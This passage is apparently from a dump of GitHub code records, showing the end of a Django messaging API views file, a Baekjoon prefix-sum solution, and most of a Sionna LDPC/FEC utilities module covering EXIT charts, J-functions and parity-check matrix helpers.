| Q(prijmatel_id=user)).order_by(\"-timestamp\")\n messagelist = list(messages)\n newmessagelist = []\n myid = user\n othersids = []\n for s in iter(messagelist):\n if myid != s.odosielatel_id and s.odosielatel_id not in othersids:\n othersids.append(s.odosielatel_id)\n if myid != s.prijmatel_id and s.prijmatel_id not in othersids:\n othersids.append(s.prijmatel_id)\n for i in iter(messagelist):\n if i.odosielatel_id in othersids:\n newmessagelist.append(i)\n othersids.remove(i.odosielatel_id)\n if i.prijmatel_id in othersids:\n newmessagelist.append(i)\n othersids.remove(i.prijmatel_id)\n if not newmessagelist:\n return JsonResponse({}, safe=False)\n for s in iter(newmessagelist):\n if myid == s.odosielatel_id:\n s.odosielatel_id = s.prijmatel_id\n else:\n s.prijmatel_id = s.odosielatel_id\n serializer = MessageSerializer(newmessagelist, many=True, context={'request': request})\n return JsonResponse(serializer.data, safe=False)\n\n\nclass MiestnostViewSet(viewsets.ModelViewSet):\n queryset = Miestnost.objects.all()\n serializer_class = MiestnostSerializer\n\n\nclass PostViewSet(viewsets.ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\n\ndef posts_view(request, miestnost):\n if request.method == \"GET\":\n posts = Post.objects.filter(miestnost_id=miestnost).order_by('-timestamp')[0:10]\n serializer = PostSerializer(posts, many=True, context={'request': request})\n return JsonResponse(serializer.data, safe=False)\n\n\ndef logout_view(request):\n return HttpResponse('
\n    Logout\n
    ')\n","repo_name":"pego149/VaiiBackend","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35668540015","text":"import sys\n\nn, s = map(int, sys.stdin.readline().split())\nlst = list(map(int, sys.stdin.readline().split()))\nsum = [0] * (n+1)\n\nfor i in range(1, n+1):\n sum[i] = sum[i-1] + lst[i-1]\n\nstart, end = 0, 1\nlength = []\n\nwhile start != n:\n if sum[end] - sum[start] >= s:\n if end - start < 1000001:\n length.append(end-start)\n start += 1\n\n else:\n if end != n:\n end += 1\n else:\n start += 1\n\nprint(min(length))","repo_name":"Rosa1026/baekjoon","sub_path":"1806.py","file_name":"1806.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70765852906","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import Layer\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport warnings\nfrom importlib_resources import files, as_file\nfrom sionna.fec.ldpc import codes\nfrom sionna.utils import log2\nfrom sionna.nr.utils import generate_prng_seq as generate_prng_seq_utils\n\n\nclass GaussianPriorSource(Layer):\n r\"\"\"GaussianPriorSource(specified_by_mi=False, dtype=tf.float32, **kwargs)\n\n Generates `fake` LLRs as if the all-zero codeword was transmitted\n over an Bi-AWGN channel with noise variance ``no`` or mutual information\n (if ``specified_by_mi`` is True). If selected, the mutual information\n denotes the mutual information associated with a binary random variable\n observed at the output of a corresponding AWGN channel (cf. Gaussian\n approximation).\n\n .. image:: ../figures/GaussianPriorSource.png\n\n The generated LLRs are drawn from a Gaussian distribution with\n\n .. math::\n \\sigma_{\\text{llr}}^2 = \\frac{4}{\\sigma_\\text{ch}^2}\n\n and\n\n .. math::\n \\mu_{\\text{llr}} = \\frac{\\sigma_\\text{llr}^2}{2}\n\n where :math:`\\sigma_\\text{ch}^2` is the channel noise variance as defined by\n ``no``.\n\n If ``specified_by_mi`` is True, this class uses the of the so-called\n `J-function` (relates mutual information to Gaussian distributed LLRs) as\n proposed in [Brannstrom]_.\n\n Parameters\n ----------\n specified_by_mi : bool\n Defaults to False. If True, the second input parameter ``no`` is\n interpreted as mutual information instead of noise variance.\n\n dtype : tf.DType\n Defaults to `tf.float32`. Defines the datatype for internal\n calculations and the output. 
Must be one of the following\n `(tf.float16, tf.bfloat16, tf.float32, tf.float64)`.\n\n Input\n -----\n (output_shape, no):\n Tuple:\n\n output_shape : tf.int\n Integer tensor or Python array defining the shape of the desired\n output tensor.\n\n no : tf.float32\n Scalar defining the noise variance or mutual information (if\n ``specified_by_mi`` is True) of the corresponding (fake) AWGN\n channel.\n\n Output\n ------\n : ``dtype``, defaults to `tf.float32`\n 1+D Tensor with shape as defined by ``output_shape``.\n\n Raises\n ------\n InvalidArgumentError\n If mutual information is not in (0,1).\n\n AssertionError\n If ``inputs`` is not a list with 2 elements.\n\n \"\"\"\n\n def __init__(self, specified_by_mi=False, dtype=tf.float32, **kwargs):\n\n if dtype not in (tf.float16, tf.float32, tf.float64, tf.bfloat16,\n tf.complex64, tf.complex128):\n raise ValueError(\"Only float dtypes are supported.\")\n\n # use real_dtype to support tf.complex\n super().__init__(dtype=dtype.real_dtype, **kwargs)\n\n assert isinstance(specified_by_mi, bool),\"specified_by_mi must be bool.\"\n self._specified_by_mi = specified_by_mi\n\n def call(self, inputs):\n \"\"\"Generate Gaussian distributed fake LLRs as if the all-zero codeword\n was transmitted over an Bi-AWGN channel.\n\n Args:\n inputs (list): ``[output_shape, no]``, where\n ``output_shape`` (tf.int32): 1D list or tensor describing the\n desired shape of the output.\n ``no`` (tf.float32): Scalar defining the noise variance or mutual\n information (if ``specified_by_mi`` is True) of the\n corresponding (fake) AWGN channel.\n\n Returns:\n 1+D Tensor (``dtype``): Shape as defined by ``output_shape``.\n \"\"\"\n\n assert isinstance(inputs, (list, tuple)), \\\n \"inputs must be a list or tuple.\"\n assert len(inputs)==2, \"inputs must be a list with 2 elements.\"\n output_shape, noise_var = inputs\n\n if self._specified_by_mi:\n # interpret noise_var as mutual information\n mi_a = tf.cast(noise_var, tf.float32)\n tf.debugging.assert_greater_equal(mi_a, 0.,\n \"Mutual information must be positive.\")\n tf.debugging.assert_less_equal(mi_a, 1.,\n \"Mutual information must be less or equal 1.\")\n #clip Ia to range (0,1)\n mi_a = tf.maximum(mi_a, 1e-7)\n mi_a = tf.minimum(mi_a, 1.)\n mu_llr = j_fun_inv_tf(mi_a)\n sigma_llr = tf.math.sqrt(2*mu_llr)\n else:\n noise_var = tf.cast(noise_var, tf.float32)\n\n # noise_var must be positive\n noise_var = tf.maximum(noise_var, 1e-7)\n sigma_llr = tf.math.sqrt(4 / noise_var)\n mu_llr = sigma_llr**2 / 2\n\n mu_llr = tf.cast(mu_llr, super().dtype)\n sigma_llr = tf.cast(sigma_llr, super().dtype)\n\n # generate LLRs with Gaussian approximation (BPSK, all-zero cw)\n # Use negative mean as we generate logits with definition p(b=1)/p(b=0)\n llr = tf.random.normal(output_shape,\n mean=-1.*mu_llr,\n stddev=sigma_llr,\n dtype=super().dtype)\n return llr\n\ndef llr2mi(llr, s=None, reduce_dims=True):\n # pylint: disable=line-too-long\n r\"\"\"Implements an approximation of the mutual information based on LLRs.\n\n The function approximates the mutual information for given ``llr`` as\n derived in [Hagenauer]_ assuming an `all-zero codeword` transmission\n\n .. math::\n\n I \\approx 1 - \\sum \\operatorname{log_2} \\left( 1 + \\operatorname{e}^{-\\text{llr}} \\right).\n\n This approximation assumes that the following `symmetry condition` is fulfilled\n\n .. 
math::\n\n p(\\text{llr}|x=0) = p(\\text{llr}|x=1) \\cdot \\operatorname{exp}(\\text{llr}).\n\n For `non-all-zero` codeword transmissions, this methods requires knowledge\n about the signs of the original bit sequence ``s`` and flips the signs\n correspondingly (as if the all-zero codeword was transmitted).\n\n Please note that we define LLRs as :math:`\\frac{p(x=1)}{p(x=0)}`, i.e.,\n the sign of the LLRs differ to the solution in [Hagenauer]_.\n\n Input\n -----\n llr : tf.float32\n Tensor of arbitrary shape containing LLR-values.\n\n s : None or tf.float32\n Tensor of same shape as llr containing the signs of the\n transmitted sequence (assuming BPSK), i.e., +/-1 values.\n\n reduce_dims : bool\n Defaults to True. If True, all dimensions are\n reduced and the return is a scalar. Otherwise, `reduce_mean` is\n only taken over the last dimension.\n\n Output\n ------\n mi : tf.float32\n A scalar tensor (if ``reduce_dims`` is True) or a tensor of same\n shape as ``llr`` apart from the last dimensions that is removed.\n It contains the approximated value of the mutual information.\n\n Raises\n ------\n TypeError\n If dtype of ``llr`` is not a real-valued float.\n\n \"\"\"\n\n if s is None:\n s = tf.ones_like(llr)\n\n if llr.dtype not in (tf.float16, tf.bfloat16, tf.float32, tf.float64):\n raise TypeError(\"Dtype of llr must be a real-valued float.\")\n\n # ensure that both tensors are compatible\n s = tf.cast(s, llr.dtype)\n\n # scramble sign as if all-zero cw was transmitted\n llr_zero = tf.multiply(s, llr)\n llr_zero = tf.clip_by_value(llr_zero, -20., 20.) # clip for stability\n x = log2(1. + tf.exp(1.* llr_zero))\n if reduce_dims:\n x = 1. - tf.reduce_mean(x)\n else:\n x = 1. - tf.reduce_mean(x, axis=-1)\n return x\n\ndef j_fun(mu):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the `J-function` in NumPy.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mu : float\n float or `ndarray` of float.\n\n Output\n ------\n : float\n `ndarray` of same shape as the input.\n \"\"\"\n assert np.all(mu<1000), \"mu too large.\"\n # we support exact 0 for EXIT (clipping is used in any way)\n assert np.all(mu>-0.0001), \"mu must be positive.\"\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mu = np.maximum(mu, 1e-10) # input must be positive for numerical stability\n mi = (1-2**(-h1*(2*mu)**h2))**h3\n return mi\n\ndef j_fun_inv(mi):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the inverse `J-function` in NumPy.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. 
math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mi : float\n float or `ndarray` of float.\n\n Output\n -------\n : float\n `ndarray` of same shape as the input.\n\n Raises\n ------\n AssertionError\n If ``mi`` < 0.001 or ``mi`` > 0.999.\n \"\"\"\n\n assert np.all(mi<0.999), \"mi must be smaller 1.\"\n assert np.all(mi>0.001), \"mi must be greater 0.\"\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mi = np.maximum(mi,1e-10)\n # add small value to avoid log(0)\n mu = 0.5*((-1/h1)*np.log2((1-mi**(1/h3)) + 1e-12))**(1/(h2))\n return np.minimum(mu, 20) # clipp the output to mu_max =20\n\ndef j_fun_tf(mu, verify_inputs=True):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the `J-function` in Tensorflow.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mu : tf.float32\n Tensor of arbitrary shape.\n\n verify_inputs : bool\n A boolean defaults to True. If True, ``mu`` is clipped internally\n to be numerical stable.\n\n Output\n ------\n : tf.float32\n Tensor of same shape and dtype as ``mu``.\n\n Raises\n ------\n InvalidArgumentError\n If ``mu`` is negative.\n \"\"\"\n assert isinstance(verify_inputs, bool), \"verify_inputs must be bool.\"\n if verify_inputs:\n # input must be positive for numerical stability\n mu = tf.maximum(mu, 1e-10)\n else:\n tf.debugging.assert_greater_equal(mu, 0., \"mu must be positive.\")\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mi = (1-2**(-h1*(2*mu)**h2))**h3\n return mi\n\ndef j_fun_inv_tf(mi, verify_inputs=True):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the inverse `J-function` in Tensorflow.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mi : tf.float32\n Tensor of arbitrary shape.\n\n verify_inputs : bool\n A boolean defaults to True. If True, ``mi`` is clipped internally\n to be numerical stable.\n\n Output\n ------\n : tf.float32\n Tensor of same shape and dtype as the ``mi``.\n\n Raises\n ------\n InvalidArgumentError\n If ``mi`` is not in `(0,1)`.\n \"\"\"\n\n assert isinstance(verify_inputs, bool), \"verify_inputs must be bool.\"\n if verify_inputs:\n # input must be positive for numerical stability\n mi = tf.maximum(mi, 1e-10) # ensure that I>0\n mi = tf.minimum(mi, 1.) 
# ensure that I=<1\n else:\n tf.debugging.assert_greater_equal(mi, 0., \"mi must be positive.\")\n tf.debugging.assert_less_equal(mi, 1., \"mi must be less or equal 1.\")\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mu = 0.5*((-1/h1) * log2((1-mi**(1/h3))))**(1/(h2))\n return tf.minimum(mu, 20) # clipp the output to mu_max =20\n\ndef plot_trajectory(plot, mi_v, mi_c, ebno=None):\n \"\"\"Utility function to plot the trajectory of an EXIT-chart.\n\n Input\n -----\n plot : matplotlib.figure\n A handle to a matplotlib figure.\n\n mi_v : float\n An ndarray of floats containing the variable node mutual\n information.\n\n mi_c : float\n An ndarray of floats containing the check node mutual\n information.\n\n ebno : float\n A float denoting the EbNo in dB for the legend entry.\n \"\"\"\n\n assert (len(mi_v)==len(mi_c)), \"mi_v and mi_c must have same length.\"\n\n # number of decoding iterations to plot\n iters = np.shape(mi_v)[0] - 1\n\n x = np.zeros([2*iters])\n y = np.zeros([2*iters])\n\n # iterate between VN and CN MI value\n y[1] = mi_v[0]\n for i in range(1, iters):\n x[2*i] = mi_c[i-1]\n y[2*i] = mi_v[i-1]\n x[2*i+1] = mi_c[i-1]\n y[2*i+1] = mi_v[i]\n\n if ebno is not None:\n label_str = f\"Actual trajectory @ {ebno} dB\"\n else:\n label_str = \"Actual trajectory\"\n\n #plot trajectory\n plot.plot(x,\n y,\n \"-\",\n linewidth=3,\n color=\"g\",\n label=label_str)\n plot.legend(fontsize=18) # and show the legend\n\ndef plot_exit_chart(mi_a=None, mi_ev=None, mi_ec=None, title=\"EXIT-Chart\"):\n \"\"\"Utility function to plot EXIT-Charts [tenBrinkEXIT]_.\n\n If all inputs are `None` an empty EXIT chart is generated. Otherwise,\n the mutual information curves are plotted.\n\n Input\n -----\n mi_a : float\n An ndarray of floats containing the a priori mutual\n information.\n\n mi_v : float\n An ndarray of floats containing the variable node mutual\n information.\n\n mi_c : float\n An ndarray of floats containing the check node mutual\n information.\n\n title : str\n A string defining the title of the EXIT chart.\n Output\n ------\n plt: matplotlib.figure\n A matplotlib figure handle\n\n Raises\n ------\n AssertionError\n If ``title`` is not `str`.\n \"\"\"\n\n assert isinstance(title, str), \"title must be str.\"\n\n if not (mi_ev is None and mi_ec is None):\n if mi_a is None:\n raise ValueError(\"mi_a cannot be None if mi_e is provided.\")\n\n if mi_ev is not None:\n assert (len(mi_a)==len(mi_ev)), \"mi_a and mi_ev must have same length.\"\n if mi_ec is not None:\n assert (len(mi_a)==len(mi_ec)), \"mi_a and mi_ec must have same length.\"\n\n plt.figure(figsize=(10,10))\n plt.title(title, fontsize=25)\n plt.xlabel(\"$I_{a}^v$, $I_{e}^c$\", fontsize=25)\n plt.ylabel(\"$I_{e}^v$, $I_{a}^c$\", fontsize=25)\n plt.grid(visible=True, which='major')\n\n\n # for MI, the x,y limits are always (0,1)\n plt.xlim(0, 1)\n plt.ylim(0, 1)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n\n # and plot EXIT curves\n if mi_ec is not None:\n plt.plot(mi_ec, mi_a, \"r\", linewidth=3, label=\"Check node\")\n plt.legend()\n if mi_ev is not None:\n plt.plot(mi_a, mi_ev, \"b\", linewidth=3, label=\"Variable node\")\n plt.legend()\n return plt\n\ndef get_exit_analytic(pcm, ebno_db):\n \"\"\"Calculate the analytic EXIT-curves for a given parity-check matrix.\n\n This function extracts the degree profile from ``pcm`` and calculates the\n variable (VN) and check node (CN) decoder EXIT curves. 
Please note that\n this is an asymptotic tool which needs a certain codeword length for\n accurate predictions.\n\n Transmission over an AWGN channel with BPSK modulation and SNR ``ebno_db``\n is assumed. The detailed equations can be found in [tenBrink]_ and\n [tenBrinkEXIT]_.\n\n Input\n -----\n pcm : ndarray\n The parity-check matrix.\n\n ebno_db : float\n The channel SNR in dB.\n\n Output\n ------\n mi_a : ndarray of floats\n NumPy array containing the `a priori` mutual information.\n\n mi_ev : ndarray of floats\n NumPy array containing the extrinsic mutual information of the\n variable node decoder for the corresponding ``mi_a``.\n\n mi_ec : ndarray of floats\n NumPy array containing the extrinsic mutual information of the check\n node decoder for the corresponding ``mi_a``.\n\n Note\n ----\n This function assumes random parity-check matrices without any imposed\n structure. Thus, explicit code construction algorithms may lead\n to inaccurate EXIT predictions. Further, this function is based\n on asymptotic properties of the code, i.e., only works well for large\n parity-check matrices. For details see [tenBrink]_.\n \"\"\"\n\n # calc coderate\n n = pcm.shape[1]\n k = n - pcm.shape[0]\n coderate = k/n\n\n # calc mean and noise_var of Gaussian distributed LLRs for given channel SNR\n ebno = 10**(ebno_db/10)\n snr = ebno*coderate\n noise_var = 1/(2*snr)\n\n # For BiAWGN channels the LLRs follow a Gaussian distr. as given below [1]\n sigma_llr = np.sqrt(4 / noise_var)\n mu_llr = sigma_llr**2 / 2\n\n # calculate max node degree\n # \"+1\" as the array indices later directly denote the node degrees and we\n # have to account the array start at position 0 (i.e., we need one more\n # element)\n c_max = int(np.max(np.sum(pcm, axis=1)) + 1 )\n v_max = int(np.max(np.sum(pcm, axis=0)) + 1 )\n\n # calculate degree profile (node perspective)\n c = np.histogram(np.sum(pcm, axis=1),\n bins=c_max,\n range=(0, c_max),\n density=False)[0]\n\n v = np.histogram(np.sum(pcm, axis=0),\n bins=v_max,\n range=(0, v_max),\n density=False)[0]\n\n # calculate degrees from edge perspective\n r = np.zeros([c_max])\n for i in range(1,c_max):\n r[i] = (i-1)*c[i]\n r = r / np.sum(r)\n l = np.zeros([v_max])\n for i in range(1,v_max):\n l[i] = (i-1)*v[i]\n l = l / np.sum(l)\n\n mi_a = np.arange(0.002, 0.998, 0.001) # quantize Ia with 0.01 resolution\n\n # Exit function of check node update\n mi_ec = np.zeros_like(mi_a)\n for i in range(1, c_max):\n mi_ec += r[i] * j_fun((i-1.) * j_fun_inv(1 - mi_a))\n mi_ec = 1 - mi_ec\n\n # Exit function of variable node update\n mi_ev = np.zeros_like(mi_a)\n for i in range(1, v_max):\n mi_ev += l[i] * j_fun(mu_llr + (i-1.) 
* j_fun_inv(mi_a))\n\n return mi_a, mi_ev, mi_ec\n\ndef load_parity_check_examples(pcm_id, verbose=False):\n # pylint: disable=line-too-long\n \"\"\"Utility function to load example codes stored in sub-folder LDPC/codes.\n\n The following codes are available\n\n - 0 : `(7,4)`-Hamming code of length `k=4` information bits and codeword length `n=7`.\n\n - 1 : `(63,45)`-BCH code of length `k=45` information bits and codeword length `n=63`.\n\n - 2 : (127,106)-BCH code of length `k=106` information bits and codeword length `n=127`.\n\n - 3 : Random LDPC code with regular variable node degree 3 and check node degree 6 of length `k=50` information bits and codeword length `n=100`.\n\n - 4 : 802.11n LDPC code of length of length `k=324` information bits and codeword length `n=648`.\n\n Input\n -----\n pcm_id : int\n An integer defining which matrix id to load.\n\n verbose : bool\n Defaults to False. If True, the code parameters are\n printed.\n\n Output\n ------\n pcm: ndarray of `zeros` and `ones`\n An ndarray containing the parity check matrix.\n\n k : int\n An integer defining the number of information bits.\n\n n : int\n An integer defining the number of codeword bits.\n\n coderate : float\n A float defining the coderate (assuming full rank of\n parity-check matrix).\n \"\"\"\n\n source = files(codes).joinpath(\"example_codes.npy\")\n with as_file(source) as code:\n pcms = np.load(code, allow_pickle=True)\n\n pcm = np.array(pcms[pcm_id]) # load parity-check matrix\n n = int(pcm.shape[1]) # number of codeword bits (codeword length)\n k = int(n - pcm.shape[0]) # number of information bits k per codeword\n coderate = k / n\n\n if verbose:\n print(f\"\\nn: {n}, k: {k}, coderate: {coderate:.3f}\")\n return pcm, k, n, coderate\n\ndef bin2int(arr):\n \"\"\"Convert binary array to integer.\n\n For example ``arr`` = `[1, 0, 1]` is converted to `5`.\n\n Input\n -----\n arr: int or float\n An iterable that yields 0's and 1's.\n\n Output\n -----\n : int\n Integer representation of ``arr``.\n\n \"\"\"\n if len(arr) == 0: return None\n return int(''.join([str(x) for x in arr]), 2)\n\ndef bin2int_tf(arr):\n \"\"\"\n Converts binary tensor to int tensor. Binary representation in ``arr``\n is across the last dimension from most significant to least significant.\n\n For example ``arr`` = `[0, 1, 1]` is converted to `3`.\n\n Input\n -----\n arr: int or float\n Tensor of 0's and 1's.\n\n Output\n -----\n : int\n Tensor containing the integer representation of ``arr``.\n \"\"\"\n len_ = tf.shape(arr)[-1]\n shifts = tf.range(len_-1,-1,-1)\n\n # (2**len_-1)*arr[0] +... 
2*arr[len_-2] + 1*arr[len_-1]\n op = tf.reduce_sum(tf.bitwise.left_shift(arr, shifts), axis=-1)\n\n return op\n\ndef int2bin(num, len_):\n \"\"\"\n Convert ``num`` of int type to list of length ``len_`` with 0's and 1's.\n ``num`` and ``len_`` have to non-negative.\n\n For e.g., ``num`` = `5`; `int2bin(num`, ``len_`` =4) = `[0, 1, 0, 1]`.\n\n For e.g., ``num`` = `12`; `int2bin(num`, ``len_`` =3) = `[1, 0, 0]`.\n\n Input\n -----\n num: int\n An integer to be converted into binary representation.\n\n len_: int\n An integer defining the length of the desired output.\n\n Output\n -----\n : list of int\n Binary representation of ``num`` of length ``len_``.\n \"\"\"\n assert num >= 0, \"Input integer should be non-negative\"\n assert len_ >= 0, \"width should be non-negative\"\n\n bin_ = format(num, f'0{len_}b')\n binary_vals = [int(x) for x in bin_[-len_:]] if len_ else []\n return binary_vals\n\ndef int2bin_tf(ints, len_):\n \"\"\"\n Converts (int) tensor to (int) tensor with 0's and 1's. `len_` should be\n to non-negative. Additional dimension of size `len_` is inserted at end.\n\n Input\n -----\n ints: int\n Tensor of arbitrary shape `[...,k]` containing integer to be\n converted into binary representation.\n\n len_: int\n An integer defining the length of the desired output.\n\n Output\n -----\n : int\n Tensor of same shape as ``ints`` except dimension of length\n ``len_`` is added at the end `[...,k, len_]`. Contains the binary\n representation of ``ints`` of length ``len_``.\n \"\"\"\n assert len_ >= 0\n\n shifts = tf.range(len_-1, -1, delta=-1)\n bits = tf.math.floormod(\n tf.bitwise.right_shift(tf.expand_dims(ints, -1), shifts), 2)\n return bits\n\ndef alist2mat(alist, verbose=True):\n # pylint: disable=line-too-long\n r\"\"\"Convert `alist` [MacKay]_ code definition to `full` parity-check matrix.\n\n Many code examples can be found in [UniKL]_.\n\n About `alist` (see [MacKay]_ for details):\n\n - `1.` Row defines parity-check matrix dimension `m x n`\n - `2.` Row defines int with `max_CN_degree`, `max_VN_degree`\n - `3.` Row defines VN degree of all `n` column\n - `4.` Row defines CN degree of all `m` rows\n - Next `n` rows contain non-zero entries of each column (can be zero padded at the end)\n - Next `m` rows contain non-zero entries of each row.\n\n Input\n -----\n alist: list\n Nested list in `alist`-format [MacKay]_.\n\n verbose: bool\n Defaults to True. If True, the code parameters are printed.\n\n Output\n ------\n (pcm, k, n, coderate):\n Tuple:\n\n pcm: ndarray\n NumPy array of shape `[n-k, n]` containing the parity-check matrix.\n\n k: int\n Number of information bits.\n\n n: int\n Number of codewords bits.\n\n coderate: float\n Coderate of the code.\n\n Note\n ----\n Use :class:`~sionna.fec.utils.load_alist` to import alist from a\n textfile.\n\n For example, the following code snippet will import an alist from a file called ``filename``:\n\n .. 
code-block:: python\n\n al = load_alist(path = filename)\n pcm, k, n, coderate = alist2mat(al)\n \"\"\"\n\n assert len(alist)>4, \"Invalid alist format.\"\n\n n = alist[0][0]\n m = alist[0][1]\n v_max = alist[1][0]\n c_max = alist[1][1]\n k = n - m\n coderate = k / n\n\n vn_profile = alist[2]\n cn_profile = alist[3]\n\n # plausibility checks\n assert np.sum(vn_profile)==np.sum(cn_profile), \"Invalid alist format.\"\n assert np.max(vn_profile)==v_max, \"Invalid alist format.\"\n assert np.max(cn_profile)==c_max, \"Invalid alist format.\"\n\n if len(alist)==len(vn_profile)+4:\n print(\"Note: .alist does not contain (redundant) CN perspective.\")\n print(\"Recovering parity-check matrix from VN only.\")\n print(\"Please verify the correctness of the results manually.\")\n vn_only = True\n else:\n assert len(alist)==len(vn_profile) + len(cn_profile) + 4, \\\n \"Invalid alist format.\"\n vn_only = False\n\n pcm = np.zeros((m,n))\n num_edges = 0 # count number of edges\n\n for idx_v in range(n):\n for idx_i in range(vn_profile[idx_v]):\n # first 4 rows of alist contain meta information\n idx_c = alist[4+idx_v][idx_i]-1 # \"-1\" as this is python\n pcm[idx_c, idx_v] = 1\n num_edges += 1 # count number of edges (=each non-zero entry)\n\n # validate results from CN perspective\n if not vn_only:\n for idx_c in range(m):\n for idx_i in range(cn_profile[idx_c]):\n # first 4 rows of alist contain meta information\n # follwing n rows contained VN perspective\n idx_v = alist[4+n+idx_c][idx_i]-1 # \"-1\" as this is python\n assert pcm[idx_c, idx_v]==1 # entry must already exist\n\n if verbose:\n print(\"Number of variable nodes (columns): \", n)\n print(\"Number of check nodes (rows): \", m)\n print(\"Number of information bits per cw: \", k)\n print(\"Number edges: \", num_edges)\n print(\"Max. VN degree: \", v_max)\n print(\"Max. CN degree: \", c_max)\n print(\"VN degree: \", vn_profile)\n print(\"CN degree: \", cn_profile)\n\n return pcm, k, n, coderate\n\ndef load_alist(path):\n \"\"\"Read `alist`-file [MacKay]_ and return nested list describing the\n parity-check matrix of a code.\n\n Many code examples can be found in [UniKL]_.\n\n Input\n -----\n path:str\n Path to file to be loaded.\n\n Output\n ------\n alist: list\n A nested list containing the imported alist data.\n \"\"\"\n\n alist = []\n with open(path, \"r\") as reader: # pylint: disable=unspecified-encoding\n # read list line by line (different length)\n for line in reader:\n l = []\n # append all entries\n for word in line.split():\n l.append(int(word))\n if l: # ignore empty lines\n alist.append(l)\n\n return alist\n\ndef make_systematic(mat, is_pcm=False):\n r\"\"\"Bring binary matrix in its systematic form.\n\n Input\n -----\n mat : ndarray\n Binary matrix to be transformed to systematic form of shape `[k, n]`.\n\n is_pcm: bool\n Defaults to False. If true, ``mat`` is interpreted as parity-check\n matrix and, thus, the last k columns will be the identity part.\n\n Output\n ------\n mat_sys: ndarray\n Binary matrix in systematic form, i.e., the first `k` columns equal the\n identity matrix (or last `k` if ``is_pcm`` is True).\n\n column_swaps: list of int tuples\n A list of integer tuples that describes the swapped columns (in the\n order of execution).\n\n Note\n ----\n This algorithm (potentially) swaps columns of the input matrix. 
Thus, the\n resulting systematic matrix (potentially) relates to a permuted version of\n the code, this is defined by the returned list ``column_swap``.\n Note that, the inverse permutation must be applied in the inverse list\n order (in case specific columns are swapped multiple times).\n\n If a parity-check matrix is passed as input (i.e., ``is_pcm`` is True), the\n identity part will be re-arranged to the last columns.\"\"\"\n\n m = mat.shape[0]\n n = mat.shape[1]\n\n assert m<=n, \"Invalid matrix dimensions.\"\n\n # check for all-zero columns (=unchecked nodes)\n if is_pcm:\n c_node_deg = np.sum(mat, axis=0)\n if np.any(c_node_deg==0):\n warnings.warn(\"All-zero column in parity-check matrix detected. \" \\\n \"It seems as if the code contains unprotected nodes.\")\n\n mat = np.copy(mat)\n column_swaps = [] # store all column swaps\n\n # convert to bool for faster arithmetics\n mat = mat.astype(bool)\n\n # bring in upper triangular form\n for idx_c in range(m):\n success = False\n # step 1: find next leading \"1\"\n for idx_r in range(idx_c,m):\n # skip if entry is \"0\"\n if mat[idx_r, idx_c]:\n mat[[idx_c, idx_r]] = mat[[idx_r, idx_c]] # swap rows\n success = True\n break\n\n # Could not find \"1\"-entry for column idx_c\n # => swap with columns from non-sys part\n # The task is to find a column with index idx_cc that has a \"1\" at\n # row idx_c\n if not success:\n for idx_cc in range(m, n):\n if mat[idx_c, idx_cc]:\n # swap columns\n mat[:,[idx_c, idx_cc]] = mat[:,[idx_cc, idx_c]]\n column_swaps.append([idx_c, idx_cc])\n success=True\n break\n\n if not success:\n raise ValueError(\"Could not succeed; mat is not full rank?\")\n\n # we can now assume a leading \"1\" at row idx_c\n for idx_r in range(idx_c+1, m):\n if mat[idx_r, idx_c]:\n mat[idx_r,:] ^= mat[idx_c,:] # bin. add of row idx_c to idx_r\n\n # remove upper triangle part in inverse order\n for idx_c in range(m-1, -1, -1):\n for idx_r in range(idx_c-1, -1, -1):\n if mat[idx_r, idx_c]:\n mat[idx_r,:] ^= mat[idx_c,:] # bin. add of row idx_c to idx_r\n\n # verify results\n assert np.array_equal(mat[:,:m], np.eye(m)), \\\n 